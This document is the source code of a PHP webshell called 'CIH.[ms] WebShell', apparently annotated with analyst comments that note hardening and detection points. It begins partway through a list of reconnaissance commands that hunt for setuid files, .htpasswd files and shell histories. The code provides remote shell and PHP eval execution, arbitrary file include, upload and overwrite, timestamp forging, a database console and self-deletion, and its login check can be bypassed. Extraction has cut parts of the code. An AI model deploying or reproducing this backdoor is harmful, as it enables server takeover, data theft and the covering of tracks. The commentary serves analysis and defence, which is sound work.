'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an', );
# you don't really need to edit it (;
#
# Analyst notes (added): this file is a PHP webshell that identifies itself as
# "CIH.[ms] WebShell". This copy was extracted with its HTML markup stripped, so the
# echo strings below hold only the text nodes of the original pages, and a few code
# fragments that sat inside markup (loop headers near the end) are missing. The code
# is left exactly as found; the comments describe what each part does.
# The array closed just above maps menu labels to ready-made shell commands;
# do_header() looks for the matching $_POST['alias'] field.
#
# $f: menu label => 'do' mode. All but 'phpinfo' are handled by the switch on
# $_REQUEST['do'] further down; 'phpinfo' is handled separately via $_POST['do'].
$f = array("SHELL" => "shell","EVAL" => "eval", "MySql Suite" => "mysql", "Server Information" => "server", "Env Informaion" => "envinfo", "PHPinfo" => "phpinfo", "Shell delete" => "delete");
# Version string shown on the 'cihshell' about page and passed to do_footer().
$ver = '0.99.1 [ beta {fix} ]';
# ok, let's start # ^^
session_start();
# Load-time timestamp; the constant 'start' is not read anywhere in the visible code.
define("start",atime());
# Diagnostics are shown only when an 'eval' field is posted (or $errors is truthy;
# $errors is not assigned in view); otherwise all error output is suppressed.
if(isset($_POST['eval'])){error_reporting(E_ALL&~E_NOTICE);}elseif($errors){error_reporting(E_ALL&~E_NOTICE);}else{error_reporting(0);}
ini_set('max_execution_time',0); set_magic_quotes_runtime(0); set_time_limit(0);
# PHP < 4.1 superglobal aliases, then magic_quotes reversal. Note that the $_ENV and
# $_FILES loops write their stripped values into $_SERVER rather than back into
# $_ENV / $_FILES.
if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS; $_GET= &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }
if (get_magic_quotes_gpc()){foreach ($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}foreach ($_SERVER as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_ENV as $key=>$value){$_SERVER[$key] = stripslashes($value);}foreach ($_FILES as $key=>$value){$_SERVER[$key] = stripslashes($value);}}
# $auth is not assigned in the visible code (presumably part of the configuration
# above this block). With loose comparison an unset $auth also equals 0, in which
# case the session is marked as logged in here and the login check below never
# applies.
if ($auth == 0) {$_SESSION['logged'] = true;}
$safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'off';} else {$safe_mode = 'On';}
# OS guess: a drive-letter colon in getcwd() means Windows; with an empty cwd it
# falls back to the OS environment variable or php_uname(). eregi() no longer
# exists in PHP 7+.
$os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "win"; else $os = "nix"; if(empty($dir)){ $opsy = getenv('OS');if(empty($opsy)){ $opsy = php_uname(); } if(empty($opsy)){ $opsy ="-"; $os = "nix"; } else { if(eregi("^win",$opsy)) { $os = "win"; }else { $os = "nix"; }}}
# First shell execution happens here, at load time and before the login check:
# exec("pwd") on *nix, exec("cd") on Windows, to learn the working directory.
if($os == "nix"){$pwd = exec("pwd");} elseif($os == "win"){$pwd = exec("cd");} if(empty($pwd)) {$pwd = getcwd();}
# functions
# Current time as a float (seconds + microseconds), PHP 4 style.
function atime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}
# Symbolic permission string (ls -l style) built from fileperms() bits: a type letter
# ('s' socket, 'l' symlink, '-' regular, 'b' block, 'd' directory, 'c' char device,
# 'p' fifo, 'u' unknown) followed by the three rwx triplets, with setuid/setgid shown
# as s/S and the sticky bit as t/T.
function fperms($file) {$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';}elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
# Byte count to a "n.nn GB" / "n.nn MB" / "n.nn KB" / "n B" string (two decimals).
function conv_size($size){ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}else {$size = $size . " B";}return $size;}
# Echo a file line by line, HTML-escaped. $ver is not declared global here, so the
# error path receives an unset value.
function fileread($opfile) {$fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} while(!feof($fh)) {$line = fgets($fh); echo htmlspecialchars($line);}}
# Variant of fileread() that wraps each line in markup (stripped in this copy);
# a truthy $stringnum adds a running line counter $i.
function fileread2($opfile,$stringnum) { $fh = fopen($opfile, 'r'); if (!$fh){error('Could not open file',$ver);} echo ''; if ($stringnum){ $i=1; while(!feof($fh)) { $line = fgets($fh); echo ''; $i++; }} else { while(!feof($fh)) { $line = fgets($fh); echo ''; } } echo '
'.$i.''.htmlspecialchars($line).'
'.htmlspecialchars($line).'

'; }
# Run one query through the (removed in PHP 7) mysql_* extension and return the
# result rows as arrays keyed by column name. $data is not reset between rows, so
# each row is built on top of the previous one (same columns, values overwritten).
function safq($query) { $arr = array();$res = mysql_query($query); if (mysql_num_rows($res) > 0) {$x=0;while($row = mysql_fetch_row($res)){foreach($row as $i => $value) {$column = mysql_field_name($res,$i);$data["$column"] = $value;$arr[$x] = $data;}$x++;}}return $arr;}
# Shell execution primitive. The command is $_POST['cmd'] (falling back to the
# argument), optionally after chdir($_POST['cmdir']); it is run through the first
# available of system(), exec(), shell_exec(), passthru(), popen(), and the raw
# output is echoed. For hardening this means disable_functions must cover all five
# to close the path; for detection, a POST carrying 'cmd' / 'cmdir' fields to this
# file is the request to look for.
function cmd_exec($cmd2) { if (isset($_POST['cmd'])) {$cmd=$_POST['cmd'];} else {$cmd = $cmd2;} $result = ''; if(isset($_POST['cmdir'])){chdir($_POST['cmdir']);} if(function_exists('system')){ob_start();system($cmd);$result = ob_get_contents();ob_end_clean();} elseif(function_exists('exec')){exec($cmd,$result);$result = join("\n",$result);} elseif(function_exists('shell_exec')){$result = shell_exec($cmd);} elseif(function_exists('passthru')){ob_start();passthru($cmd);$result = ob_get_contents();ob_end_clean();} elseif(is_resource($f = popen($cmd,"r"))){$result = "";while(!feof($f)) { $result .= fread($f,1024); }pclose($f);} echo $result; }
# Arbitrary PHP execution: eval() of the posted 'eval' field.
function code_eval() {if (isset($_POST['eval'])){echo "\n result is:

";eval($_POST['eval']);}}
# Print the error banner, the footer, then die(). $text is not used by the body as
# it appears in this copy (the markup that carried it was stripped).
function error($text, $ver) { echo '

error occured:

'; do_footer($ver); die(); }
# Print $text inside (stripped) markup.
function notice($text) { echo "
$text
"; }
# Page header: title, one menu entry per $f item, an extra (stripped) element when
# $auth is truthy, then a status line that fingerprints the host: HTTP_HOST,
# fperms($path), php_uname(), safe_mode, whether curl/mysql/mssql/pg/oracle
# functions exist, phpversion(), and the disable_functions setting.
function do_header($f, $auth, $os, $path) { echo ''; if (isset($_POST['cmd']) || isset($_POST['alias'])) {echo ''; } else{echo'';} echo' CIH.[ms] WebShell
'; echo ""; foreach($f as $k=>$v) { echo " "; } if($auth){echo "";} $disfun = ini_get('disable_functions'); $safe_mode = ini_get("safe_mode"); if (!$safe_mode) {$safe_mode = 'Off';} else {$safe_mode = 'On';} $mysql_try = function_exists('mysql_connect'); if($mysql_try){ $mysql = 'On';} else {$mysql = 'Off';} $pg_try = function_exists('pg_connect'); if($pg_try){$pg = 'On';}else{$pg = 'Off';} $mssql_try = function_exists('mssql_connect'); if($mssql_try){$mssql = 'On';}else{$mssql = 'Off';} $ora_try = function_exists('ocilogon'); if($ora_try){$ora = 'On';}else{$ora = 'Off';} $curl_try = function_exists('curl_version'); if($curl_try) {$curl = 'On';} else {$curl = 'Off';} $perms = fperms($path); echo '
cihshell on '.$_SERVER['HTTP_HOST'].'
'.$perms.' | OS: '.php_uname().' | safe mode: '.$safe_mode.' | cURL: '.$curl.' | MySQL: '.$mysql.' | MSSQL: '.$mssql.' | PostgreSQL: '.$pg.' | Oracle: '.$ora.' | PHP: '.phpversion().'
 
'; if (!empty($disfun)){ echo '
disabled functions: '.$disfun.'
';} }
# Page footer (markup stripped).
function do_footer($ver) { echo '
'; }
# end of functions #
# Login handling: the posted login/password are compared with $login / $password
# (configuration values not visible in this block) using loose ==. On success the
# session flag 'logged' is set; on failure the login form is re-rendered and the
# script dies. The $auth == 0 shortcut above sets the same flag without credentials.
if (!empty($_POST['login']) && !empty($_POST['password'])){ if ($_POST['login'] == $login && $_POST['password'] == $password){ $_SESSION['logged'] = true;} else {echo ' login
login:   password:  
incorrect login or password
'; die();}}
# 'logout' clears the session flag.
if (isset ($_POST['do']) && $_POST['do']=='logout') { unset($_SESSION['logged']); }
# Everything from here to the final else (which renders the login form) runs only
# with the session flag set. Most handlers print their page and end with
# do_footer(); die(), so one request performs one action.
if ($_SESSION['logged'] == true){
# 'phpinfo' mode dumps phpinfo() and exits.
if (isset($_POST['do']) && $_POST['do']=='phpinfo'){echo'
'; phpinfo();echo'
';die();}
# 'download' streams $_POST['ffile'] as an attachment named by $_POST['filename'];
# 'preview' include()s $_POST['ffile'], i.e. runs it as PHP.
if (isset($_POST['fdo']) && isset($_POST['ffile'])){ $ffile = $_POST['ffile']; switch($_POST['fdo']){ case 'download': $fl = $_POST['filename'];header("Content-type: application/x-octet-stream");header("Content-disposition: attachment; filename=".$fl.";");readfile($ffile);die();break; case 'preview': include($_POST['ffile']);die(); break; }}
# Working path selection: f_path/f_file navigation ('..' truncates at the last '/'),
# or an explicit 'path', else the load-time $pwd ('restore' forces $pwd). Backslashes
# are normalised to '/' and single quotes removed before the header is rendered.
if(isset($_POST['f_file'])) { if ($_POST['f_file'] == "..") { $slashpos = strpos($_POST['f_path'], strrchr($_POST['f_path'], "/")); $path = substr($_POST['f_path'], 0, $slashpos); } else {$path = $_POST['f_path']."/".$_POST['f_file'];} } elseif(isset($_POST['path'])) {$path = $_POST['path'];} else {$path = $pwd;} if(isset($_POST['restore'])){$path = $pwd;} $path = str_replace("\\", "/", $path);$path = str_replace("'", "", $path);
do_header($f, $auth, $os, $path); echo '
';
# Safe-mode # working
# Safe-mode helper pages (safe_mode, sm_inc, sm_mysql). Only form text survives
# here; the sm_* handlers pass $version to do_footer(), a variable that is never
# assigned ($ver is the version variable).
if (isset($_POST['safe_mode'])){ echo "
Try to read file(include):
 
 
Try to read file(include):
: database: login: password:
 
 
"; do_footer($ver); die(); }
# Safe_Mode functions
if (isset($_POST['sm_inc'])) { echo "


"; do_footer($version); die();}
if(isset($_POST['sm_mysql'])) { echo "


"; do_footer($version);die();}
if ($safe_mode == "On" && !isset($_POST['safe_mode'])) { notice('
safe_mode is On.
'); }
# File-manager forms. 'New File' and 'New Dir' only render forms; 'Upload' copies
# $_FILES['userfile'] into $_POST['path'], under the uploaded name or, when
# 'newfilech' is set, under $_POST['newfile'], and reports the outcome.
if (isset($_POST['fileact'])){switch($_POST['fileact']){ case 'New File': $cdir = $_POST['curdir']; echo "

"; do_footer($ver); die();break;
case 'New Dir': $curdir = $_POST['curdir']; echo "

"; do_footer($ver);die();break;
case 'Upload': if (isset($_FILES['userfile'])) { $file = $_FILES['userfile']; $curdir = $_POST['path']; if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; } if($file['error']!=0) error($file['error']); else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..");}}} echo "
Upload from your computer:


New name :
 
 
";do_footer($ver);die();break; }}
# File Manager : File actions
# Each handler is triggered by the presence of one POST field and acts on
# $_POST['ffile']: rename (newname), copy (newpath), chmod (mode string used as
# given), touch (mtime/atime set to strtotime($_POST['touch']) -- forensic caveat:
# timestamps on a host where this shell ran may have been chosen by the operator),
# write (wrcont), create (curdir/nfname), mkdir (curdir/dirname).
if(isset($_POST['newname'])) // rename
{rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to  ".$_POST['newname']."...");}
if(isset($_POST['newpath'])) //copy
{copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo "
File was successfuly copied to  ".$_POST['newpath']."...
";}
if(isset($_POST['chmod'])) // chmod
{$a = chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo "
We hope that permissions for file were successfuly changed to  ".$_POST['chmod']." ^^
";}
if(isset($_POST['touch'])) // touch
{$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo "
We hope that touch for file were successfuly changed to  ".$_POST['touch']." ^^
";}
if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file
$wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "
File $wrpath   was successfuly modified
";}
if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file
{$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}}
if (isset($_POST['dirname']) && isset($_POST['curdir'])) // new directory
{$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']." was successfuly created.");}else{error('An error occured while creating dir', $ver);} }
# File Manager : Directory actions
# 'rename' renders a form; 'delete' is rmdir($_POST['dirr']). The single-file
# 'delete' that follows is unlink($_POST['ffile']) (its trailing break sits outside
# any switch or loop). 'diract' renders the directory action form for
# $_POST['cmdir'].
if (isset($_POST['ddo']) && isset($_POST['dirr'])){ switch($_POST['ddo']){ case 'rename': echo"
to

"; do_footer($ver);die();break; case 'delete': rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']." was successfuly deleted.");do_footer($version);break;}}
if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){ unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("".$_POST['ffile']." was successfuly deleted.");break; }
if(isset($_POST['diract'])) {$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']); echo"
File actions
dir:$path  |   permissions: $perms   
      >
      >


 
";do_footer($ver);die();}
# switch $do #
# Mode dispatch on $_REQUEST['do'] (GET or POST); every branch ends with
# do_footer(); die().
#  mysql    - connects with the posted mysqlw_* host/port/login/password (defaults
#             'localhost', 3306, 'dblogin', 'dbpassword'), selects mysqlw_db, splits
#             $_POST['sql'] on ';' and runs each statement through safq(), printing
#             rows and mysql_affected_rows().
#  server   - dumps $_SERVER.   envinfo - dumps $_ENV.
#  delete   - self-removal: unlink() of this script's own basename taken from
#             $_SERVER['PHP_SELF'], resolved relative to the current directory.
#             Once it succeeds the file is gone; web-server access logs and backups
#             are where evidence of its use remains.
#  eval     - renders a form and, when 'eval' is posted, runs code_eval().
#  shell    - renders the command form; no call to cmd_exec() survives in this copy,
#             so it presumably sat inside the stripped markup.
#  cihshell - about page.   default - error page.
if (isset($_REQUEST['do'])) { switch ($_REQUEST['do']){
case 'mysql': if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '
';$sqlq = $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db) {if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) { $number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;} echo "
query # ".$number.":".htmlspecialchars($query)."
"; if ($error){ notice("Error : ".$error.""); } else {if(is_array($r)){echo ''; if(is_array($r[0])){echo "";foreach($r[0] as $n=>$v){echo "";}echo '';}foreach($r as $a){echo ""; if(is_array($a)){foreach($a as $n=>$v){echo "";}}else{echo "";}echo '';}echo '
$n
$v$a
';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."
"; } }} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '
'; } echo "


"; do_footer($ver); die(); break;
case 'server': echo '';foreach($_SERVER as $k=>$v) {echo "";}echo '
$k$v
';do_footer($ver); die();break;
case 'envinfo': echo '';foreach($_ENV as $k=>$v) {echo "";}echo '
$k$v

';do_footer($ver);die();break;
case 'delete': if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "
cihshell has been deleted successfully..bye-bye ):


"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break;
case 'eval': echo "

"; if (isset($_POST['eval'])){ echo "
";code_eval();echo "

";} do_footer($ver);die(); break;
case 'shell': echo " ";echo "
";echo"


";do_footer($ver); die();break;
case 'cihshell':echo "
Coded by Berkut.

© 2007

Fixed by DCRM.

© 2008


CIH.[ms] WebShell v.$ver


It has so many strong points that it is impossible to write them here (:
";do_footer($ver); die();break; default: error('There is no such function',$ver); break;}}
# file actions
# Per-file page when $path is a file: permissions, size, ctime/mtime, then the
# chosen 'fdo' action -- view (fileread2), 'view in HEX' (hex-dump loop), or the
# edit/chmod/touch/rename/copy forms; with no action the first 30 lines are shown.
# When $path is a directory the listing follows (icon chosen by extension, Windows
# drive scan c: to z:), and the outer else renders the login form for
# unauthenticated visitors. From the hex-dump loop onward the extraction apparently
# cut the for-loop headers along with the markup, so the remaining code is left
# exactly as found.
if(is_file($path)) {$perms = fperms($path); $size = filesize($path."/".$file); $size = conv_size($size); $size_fix = conv_size(filesize($path)); $pp = $_POST['f_path'];$ppp = $_POST['f_file']; echo "
File actions
file: $path  |   permissions: $perms   |   size: $size_fix  |   Create time: ".date("d.m.Y H:i:s",filectime($path))."  |  Modify time: ".date("d.m.Y H:i:s",filemtime($path))."
"; if (isset($_POST['fdo']) && isset($_POST['ffile'])){ $ffile = $_POST['ffile']; switch($_POST['fdo']){ case 'view': fileread2($ffile, $stringnum); break; case 'view in HEX': $fi=fopen($path,"rb"); if ($fi) {$str = fread($fi,filesize($path));$n=0;$a0="00000000
";$a1="";$a2=""; for ($i=0; $i";$a1.="
";$a2.="
";}}echo "";echo"
$a0$a1$a2
"; }break; case 'edit': echo "
"; break; case 'chmod': echo"
for

";break; case 'touch': echo"
for

";break; case 'rename': echo"
to

";break; case 'copy': echo"
to

";break; }} else { $fh = fopen($path, 'r'); if (!$fh){error('Could not open file',$ver);}echo '';if ($stringnum){$i=1;while(!feof($fh) & $i<=30) {$line = fgets($fh); echo ''; $i++;}}else {while(!feof($fh) & $i<=30) {$line = fgets($fh); echo ''; }}echo '
'.$i.''.htmlspecialchars($line).'
'.htmlspecialchars($line).'
';} echo '
';do_footer($ver);die();} elseif (is_dir($path)) { $dirs=array(); $files=array(); $dir=opendir($path); while (($file=readdir($dir))!==false) { if ($file=="." || $file=="..") continue; if (is_dir("$path/$file")) {$dirs[]=$file;} else {$files[]=$file;}}closedir($dir); } else {error('it isn\'t a directory', $ver);} if (!$dir){error('An error occured while opening directory '.$path, $ver);} sort($dirs); sort($files); echo ""; echo "";echo "";echo ""; for ($i=0; $i";} for ($i=0; $i array("php","phtml","php3","php4","inc"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), "code"=>array("tcl","h","c","cpp", "pl", "cgi"), "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "sess"=>array("sess"), "dwnld"=>array("exe","com","pif","src","lnk","zip","rar") ); $filename = $files[$i]; $ext = explode(".",$filename);$c = count($ext)-1;$ext = $ext[$c];$ext = strtolower($ext);$rft = "";foreach($filetypes as $key=>$value){if (in_array($ext,$value)) {$ico = $key; break;} } if($ico==''){$ico = 'none';}} $wtf = '/'.$files[$i];if ($wtf == $_SERVER['SCRIPT_NAME']) {echo"";} else { echo""; } }echo '
"; # drives if ($os == "win") { echo "
";echo "";for($d='c';$d<='z';$d++){if(is_dir($d.":/"))echo ""; }echo "
";}echo "
"; echo "|||";echo "
"; echo "
 namesizelast modifiedpermissions
[$ico]$size$last_mod$perms
[shell]$size$last_mod$perms
[$ico]$size$last_mod$perms
 
';do_footer($ver);} else {echo ' login
login:  password:  
';} ?>